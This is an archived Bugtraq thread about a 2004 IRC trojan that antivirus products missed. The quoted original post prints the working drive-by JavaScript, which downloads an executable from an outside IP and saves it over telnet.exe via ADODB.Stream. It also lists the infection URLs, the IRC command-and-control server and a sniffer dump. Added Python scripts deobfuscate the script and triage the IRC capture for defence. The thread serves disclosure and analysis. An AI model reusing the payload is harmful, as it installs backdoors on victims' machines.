 
Bugtraq mailing list archives
RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection
From: "Romulo M. Cholewa" <rmc () rmc eti br>
Date: Mon, 14 Jun 2004 18:01:45 -0300
Interesting, I hope this is NOT a trend or new policy.

On Friday 4th 13:34 -0300 GMT, I sent to the focus-virus list a message about a new malware of some sort that was not being detected by Symantec AV Corporate (Client Security with 02/06/2004 rev. 17 - now, with defs. from 13/06/2004 rev. 17, still NO detection, no action). The code is named "d0r1t1s" as it arrived to me. The message was not "acted upon" and didn't make it to the list. I sent the message to Mr. Mark Fossi on Sat 05/06/2004 12:06 -03:00 GMT, and have received no reply so far.

Back to business. I was having a discussion earlier this month with a friend about malware not being detected by major AV vendor products, when he said to me that he had a code (a rootkit of some sort) that was not being detected by Symantec products, and that was spreading fast through IRC (IRC is very popular here in Brazil). I asked him to send the file in, and it got through Symantec AV for Gateways AND Symantec Client Security. So far, the file (rar packed) is sitting here at my desktop without being detected by realtime protection or manual / scheduled scans.

It's even more interesting to see Google results:
http://www.google.com/search?hl=en&ie=UTF-8&q=d0r1t1s&btnG=Google+Search

Like I said in my previous emails, I would sleep better at night if I see this code analyzed and properly detected. According to my friend, Kaspersky and McAfee based products are detecting the threat so far.
[from the message he sent to me stating that Kaspersky detected it]:

D:\temp\d0r1t1s.rar/d0r1t1s.exe/dorod.exe   Infected  Backdoor.HacDef.084
D:\temp\d0r1t1s.rar/d0r1t1s.exe/niamx       Infected  Worm.Win32.Randon
D:\temp\d0r1t1s.rar/d0r1t1s.exe/ppi.exe     Infected  Backdoor.MotivFTP.12
D:\temp\d0r1t1s.rar/d0r1t1s.exe/redroses    Infected  Backdoor.IRC.Zapchast
D:\temp\d0r1t1s.rar/d0r1t1s.exe/wexp.exe    Infected  Exploit.Win32.RPCLsa.01.c

RAV Antivirus Online file Scan results (as of 14/06/2004 10:00 -03:00 GMT):

d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->dir32.exe->(CExe) is infected with Tool:HideWindows
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->dorod.exe->(FSGPE) is infected with Backdoor:Win32/Hackdef.0_84
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->niamx is suspicious of IRC/Generic*
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->ppi.exe->(UPXW) is infected with Backdoor:Win32/MotivFTP.1_2
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->van32.exe->(FSGPE) is infected with Trojan:Win32/HideWindow

(only the reported infected files shown to keep it readable)

Regards,

Romulo M. Cholewa
Home: http://www.rmc.eti.br
News: http://www.rmc.eti.br/news
PGP key id 0x7F8A3B40

] -----Original Message-----
] From: Rusty Chiles [mailto:rustychiles () cox net]
] Sent: Thursday, June 03, 2004 7:35 PM
] To: bugtraq () securityfocus com
] Subject: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection
]
] It seems that a new trojan is making the rounds on irc. Nobody else seems to have figured it out yet, as there is no antivirus pattern out.
]
] It seems that things on this list get attention quicker, and my virus case hasn't even been looked at yet from any av vendor. I'd like to post what I've found to speed the process up.
]
] While on irc, a client posted a link to the following url. I was on a fully patched windows xp sp1 box at the time with up to date virus scan. (Symantec AV 2004)
]
] I click the url, and see a picture, and a mini popup window. Thought it to be strange, but nothing else of it at the time.
]
] **THIS URL IS NOT SAFE** DO NOT CLICK
] http:-//www.teamwwindy.com/thekiss.jpg
] **THIS URL IS NOT SAFE** DO NOT CLICK
]
]
] ** UPDATE ***
] I am seeing this spread from clients posting a new url today as well
] http:-//www.rvsgroups.com/nfos/DOOM.III-DEViANCE/
] ** DO NOT GO TO THIS URL UNLESS YOU WANT TO BE INFECTED **
]
] (ps links are broken with - intentionally to prevent infection)
]
]
] Symantec on latest pattern detects nothing.
] Trend Micro internet security detects some sort of javascript Exploit; however in this case the payload still infected the machine using trend.
]
] The web exploit that installs the payload runs this javascript code
] --------------snip----------------snip-------------------snip-----------------------------------------
] function getRealShell() {
]   myiframe.document.write("<SCRIPT SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>");
] }
]
] document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
] setTimeout("getRealShell()",100);
]
] --------------snip----------------snip-------------------snip-----------------------------------------
] the file shellscript(1).js is downloaded; shellscript.js is run and contains this code
]
] --------------snip----------------snip-------------------snip-----------------------------------------
] var downloadurl="http://66.119.180.10:8080/a.exe";
]
] if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
]   savetopath="C:\\WINDOWS\\system32\\telnet.exe";
] if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
]   savetopath="C:\\WINNT\\system32\\telnet.exe";
]
] payloadURL = downloadurl;
] var x = new ActiveXObject("Microsoft.XMLHTTP");
] x.Open("GET",payloadURL,0);
] x.Send();
]
] function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }
]
] var s = new ActiveXObject(bla());
] s.Mode = 3;
] s.Type = 1;
] s.Open();
] s.Write(x.responseBody);
] s.SaveToFile(savetopath,2);
]
] location.href = "telnet://";
]
] --------------snip----------------snip-------------------snip-----------------------------------------
] At this point I see a process telnet.exe is in the task manager. This is the a.exe file that was downloaded by shellscript.js moved to c:\windows\telnet.exe or telnet.bak
]
] (something to do with windows file protection I believe)
]
] (note a registry key was also made to rename telnet.bak to telnet.exe on the next boot........ giving you a version of telnet that is actually a backdoor) (there is also a runonce reg key made to msmsgr.exe which is also just a copy of the a.exe file that the earlier javascript exploit copied up)
]
] Now once the payload has executed (a.exe or telnet.exe)
]
] It connects to this irc server 66-119-180-10.van.zoolink.com:6667
] Here's a sniffer dump of the first few seconds.
]
] NICK zapvc
] USER zxayd 0 0 :zapvc
] :irc.server NOTICE zapvc :*** If you are having problems connecting due to ping timeouts, please type /quote pong 81863547 or /raw pong 81863547 now.
] PING :81863547
] PONG 81863547
] :IRC!IRC@irc.server PRIVMSG zapvc :VERSION
] :irc.server 001 zapvc :Welcome to the Private IRC Network zapvc!zxayd () mydomain changed com
] :irc.server 002 zapvc :Your host is irc.server, running version Unreal3.2-beta19
] :irc.server 003 zapvc :This server was created Mon Jan 12 15:18:40 2004
] :irc.server 004 zapvc irc.server Unreal3.2-beta19 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzN
] :irc.server 005 zapvc MAP KNOCK SAFELIST HCN MAXCHANNELS=5 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server
] :irc.server 005 zapvc WALLCHOPS WATCH=128 SILENCE=5 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSM NETWORK=Private CASEMAPPING=ascii :are supported by this server
] :irc.server 251 zapvc :There are 922 users and 2 invisible on 1 servers
] :irc.server 254 zapvc 5 :channels formed
] :irc.server 255 zapvc :I have 924 clients and 0 servers
] :irc.server 265 zapvc :Current Local Users: 924 Max: 1719
] :irc.server 266 zapvc :Current Global Users: 924 Max: 926
] JOIN #desk
] :irc.server 422 zapvc :MOTD File is missing
] USERHOST zapvc
] JOIN #desk
] USERHOST zapvc
] JOIN #desk
] USERHOST zapvc
] :zapvc!zxayd@ip68-2-130-81. () mydomain changed com JOIN :#desk
] :irc.server 332 zapvc #desk :.mirc spread stop
] :irc.server 333 zapvc #desk spn 1087025036
] :irc.server 353 zapvc @ #desk :zapvc @spn @_p_
] :irc.server 366 zapvc #desk :End of /NAMES list.
] PRIVMSG #desk :
] :irc.server 302 zapvc :zapvc=+zxayd () mydomain changed com
] :irc.server 302 zapvc :zapvc=+zxayd () mydomain changed com
] :irc.server 302 zapvc :zapvc=+zxayd () mydomain changed com
] :irc.server 412 zapvc :No text to send
]
] If I manually join #desk
] --------------------------------------------------------------------------------------------------
] You are now talking on #desk
] --- Topic for #desk is .mirc spread stop
] --- Topic for #desk set by spn at Sat Jun 12 00:23:56
]
] From the topic it looks like .mirc spread stop is a remote control command to stop the spread. I am unsure what other commands are available to those who are controlling the trojan.
]
] It is hijacking the MIRC client of the person infected and using this functionality to spread by messaging clients with the url of the website that the infection occurs from.
]
] As of this morning the channel #desk is unoccupied. The irc server is still up, no public channels, and a client connection count of about 800.
]
] I submitted samples to trend micro, and wanted to submit to symantec but their submission process is overly complicated; since I no longer had their product installed I couldn't submit samples.
]
] Abuse departments where the webpage resides, as well as the irc server resides have been contacted, but no action has been taken thus far.
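The quoted shellscript.js hides the ADODB.Stream ProgID by assembling it from single-character literals inside a helper function, which is exactly the kind of trick that defeats a plain string signature. The following is an added example, not code from either post: a small static triage script that folds string concatenation and inlines constant-returning functions before looking for the XMLHTTP + ADODB.Stream + SaveToFile combination. The sample script it runs on is constructed to mirror the quoted code, with the real host replaced by a placeholder; the function and variable names are my own.

```python
import re

# Constructed sample modelled on the quoted shellscript.js (placeholder host,
# not the real one); this is an added example, not the post's own code.
SAMPLE_SCRIPT = r'''
var downloadurl="http://example.invalid:8080/a.exe";
if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
  savetopath="C:\\WINDOWS\\system32\\telnet.exe";
payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "."
  + "S" + "t" + "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://";
'''

# ProgIDs that give page script the ability to fetch a file or write to disk.
SUSPICIOUS_PROGIDS = {"microsoft.xmlhttp", "msxml2.xmlhttp", "adodb.stream",
                      "wscript.shell", "shell.application"}

_STR = r'"((?:[^"\\]|\\.)*)"'                      # one double-quoted literal
_CONCAT_RE = re.compile(_STR + r'\s*\+\s*' + _STR)  # "x" + "y"
_CONST_FUNC_RE = re.compile(r'function\s+(\w+)\s*\(\s*\)\s*\{\s*return\s+'
                            + _STR + r'\s*;?\s*\}')
_ACTIVEX_RE = re.compile(r'ActiveXObject\s*\(\s*' + _STR + r'\s*\)')


def fold_string_concats(js: str) -> str:
    """Collapse "A" + "D" + "O" ... into one literal, repeating until stable,
    so a ProgID built from single characters becomes greppable again."""
    prev = None
    while prev != js:
        prev = js
        js = _CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


def inline_constant_functions(js: str) -> str:
    """Replace calls to zero-argument functions that only return a string
    literal (the bla() indirection) with that literal. The definition itself
    is left alone via the lookbehind."""
    for name, value in _CONST_FUNC_RE.findall(js):
        call = re.compile(r'(?<!function\s)\b' + re.escape(name) + r'\s*\(\s*\)')
        js = call.sub(lambda m, v=value: '"' + v + '"', js)
    return js


def analyze_script(js: str) -> dict:
    """Deobfuscate, then report ProgIDs, URLs and whether the fetch-and-save
    drive-by combination is present."""
    deobf = inline_constant_functions(fold_string_concats(js))
    progids = {p.lower() for p in _ACTIVEX_RE.findall(deobf)}
    called = {m.lower() for m in re.findall(r'\.(\w+)\s*\(', deobf)}
    urls = re.findall(r'https?://[^\s"\'<>]+', deobf)
    drive_by = ("adodb.stream" in progids
                and bool(progids & {"microsoft.xmlhttp", "msxml2.xmlhttp"})
                and "savetofile" in called)
    return {
        "progids": sorted(progids),
        "suspicious_progids": sorted(progids & SUSPICIOUS_PROGIDS),
        "urls": urls,
        "drive_by_download": drive_by,
        "was_obfuscated": deobf != js,
    }


if __name__ == "__main__":
    for key, value in analyze_script(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Matching on the unfolded ProgID pair plus the SaveToFile call, rather than on ActiveXObject alone, keeps ordinary intranet pages of that era (which used XMLHTTP legitimately) out of the alert stream; the `was_obfuscated` flag is a useful secondary signal on its own.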
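The sniffer dump in the quoted post shows the shape a responder can key on: a random-looking NICK/USER pair, a CTCP VERSION probe straight after registration, repeated JOINs to one channel before the server is ready, and a channel topic that is really an operator command (".mirc spread stop"). As an added example, not code from either post, here is a small IRC line parser plus a triage pass that pulls those facts out of a capture and explains why the session looks like bot command and control. The capture is constructed to match the quoted dump (client hostnames replaced by a placeholder); the heuristics and names are mine.

```python
import re
from collections import Counter

# Constructed capture modelled on the sniffer dump in the quoted post: same
# message shapes, client hostnames replaced with a placeholder.
SAMPLE_CAPTURE = """\
NICK zapvc
USER zxayd 0 0 :zapvc
:irc.server NOTICE zapvc :*** If you are having problems connecting due to ping timeouts, please type /quote pong 81863547 or /raw pong 81863547 now.
PING :81863547
PONG 81863547
:IRC!IRC@irc.server PRIVMSG zapvc :VERSION
:irc.server 001 zapvc :Welcome to the Private IRC Network zapvc!zxayd@host.invalid
:irc.server 251 zapvc :There are 922 users and 2 invisible on 1 servers
JOIN #desk
:irc.server 422 zapvc :MOTD File is missing
USERHOST zapvc
JOIN #desk
USERHOST zapvc
JOIN #desk
:zapvc!zxayd@host.invalid JOIN :#desk
:irc.server 332 zapvc #desk :.mirc spread stop
:irc.server 333 zapvc #desk spn 1087025036
:irc.server 353 zapvc @ #desk :zapvc @spn @_p_
:irc.server 366 zapvc #desk :End of /NAMES list.
"""

BOT_COMMAND_RE = re.compile(r"^[.!]\w+(?:\s+\w+)*$")   # e.g. ".mirc spread stop"


def parse_irc_line(line):
    """Split one IRC protocol line into (prefix, command, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    return prefix, parts[0].upper(), parts[1:], trailing


def looks_random(name):
    """Heuristic only: short, all-lowercase, vowel-poor names like zapvc/zxayd."""
    if not (4 <= len(name) <= 8 and name.isalpha() and name.islower()):
        return False
    return sum(c in "aeiou" for c in name) / len(name) < 0.3


def triage_session(capture):
    """Walk the capture once and collect the facts a responder needs."""
    facts = {"nick": None, "user": None, "channels": set(), "topics": {},
             "members": {}, "join_attempts": Counter(),
             "ctcp_version_probe": False, "users_on_network": None}
    for raw in capture.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        prefix, cmd, params, trailing = parse_irc_line(raw)
        client_side = prefix is None           # lines the infected host sent
        if cmd == "NICK" and client_side:
            facts["nick"] = params[0]
        elif cmd == "USER" and client_side:
            facts["user"] = params[0]
        elif cmd == "JOIN" and client_side:
            facts["join_attempts"][params[0]] += 1
        elif cmd == "JOIN":                      # server-confirmed join
            facts["channels"].add(trailing or params[0])
        elif cmd == "332":                       # RPL_TOPIC
            facts["topics"][params[1]] = trailing
        elif cmd == "353":                       # RPL_NAMREPLY
            facts["members"][params[2]] = (trailing or "").split()
        elif cmd == "PRIVMSG" and trailing and trailing.strip("\x01") == "VERSION":
            facts["ctcp_version_probe"] = True
        elif cmd == "251" and trailing:          # RPL_LUSERCLIENT
            m = re.search(r"There are (\d+) users", trailing)
            if m:
                facts["users_on_network"] = int(m.group(1))
    return facts


def indicators(facts):
    """Turn collected facts into human-readable reasons to treat this as C2."""
    flags = []
    for chan, topic in facts["topics"].items():
        if topic and BOT_COMMAND_RE.match(topic):
            flags.append(f"{chan}: topic is a bot command ({topic!r})")
    for chan, n in facts["join_attempts"].items():
        if n >= 3:
            flags.append(f"{chan}: {n} JOIN attempts before registration finished")
    if facts["ctcp_version_probe"]:
        flags.append("CTCP VERSION probe from the server right after connect")
    if looks_random(facts["nick"] or "") and looks_random(facts["user"] or ""):
        flags.append(f"random-looking nick/user ({facts['nick']}/{facts['user']})")
    for chan, members in facts["members"].items():
        ops = [m for m in members if m.startswith(("@", "~", "&"))]
        if ops and len(members) <= 4:
            flags.append(f"{chan}: near-empty channel run by operators {ops}")
    return flags


if __name__ == "__main__":
    f = triage_session(SAMPLE_CAPTURE)
    print(f"nick={f['nick']} user={f['user']} network_users={f['users_on_network']}")
    for flag in indicators(f):
        print(" -", flag)
```

None of these signals is conclusive alone (legitimate clients also get VERSION probes, and some humans pick vowel-poor nicks), but a 900-user network with five channels whose topic is a command string, reached by a freshly written telnet.exe, is the combination worth paging on; the facts dictionary is also what you would hand to the abuse desks the poster mentions.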
Current thread:
- RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection Romulo M. Cholewa (Jun 14)
- <Possible follow-ups>
- RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection Drew Copley (Jun 14)
 


